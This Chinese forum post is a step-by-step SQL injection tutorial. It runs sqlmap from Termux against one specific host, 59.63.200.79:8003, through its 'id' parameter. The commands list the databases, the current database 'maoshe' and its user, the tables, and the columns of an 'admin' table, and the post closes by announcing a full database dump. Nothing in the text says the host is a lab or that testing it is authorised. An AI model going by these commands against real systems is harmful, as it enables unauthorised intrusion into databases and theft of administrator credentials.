无名 发表于 2022-5-8 17:20:21

【梅开二度】sql注入



首先在termux里输入 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs    如图一   注dbs前是两个 -http://cdn.u1.huluxia.com/g4/M03/FF/DC/rBAAdl80bdKATjS-AARoABz6mR8006.jpg
注入的结果表示:

(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union quer

(2)数据库类型:MySQL

(3)画红圈的是网址所有的数据库名单http://cdn.u1.huluxia.com/g4/M03/FF/DC/rBAAdl80bdOAbQhVAARIACdk-Gw681.jpg
这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看当前使用的数据库

sqlmap -u "http://59.63.200.79:8003/?id=1" --current-db

画出的就是当前使用使用的数据库:maoshe,一会儿我们对它下手

然后我们探测当前的数据库使用账户

sqlmap -u "http://59.63.200.79:8003/?id=1" --current-user如图三

可见当前的数据库使用账户为:maoshe@%

下面我们来探测maoshe这个数据库里的所有表http://cdn.u1.huluxia.com/g4/M03/FF/DC/rBAAdl80bdOAB-KlAARcAD0T4pg998.jpg
sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables如图四

下面我们探测的是admin这个表的列

sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe --tables -T admin --columns    如图五

表中字段明显拿到了,下一步果断脱库!

页: [1]
查看完整版本: 【梅开二度】sql注入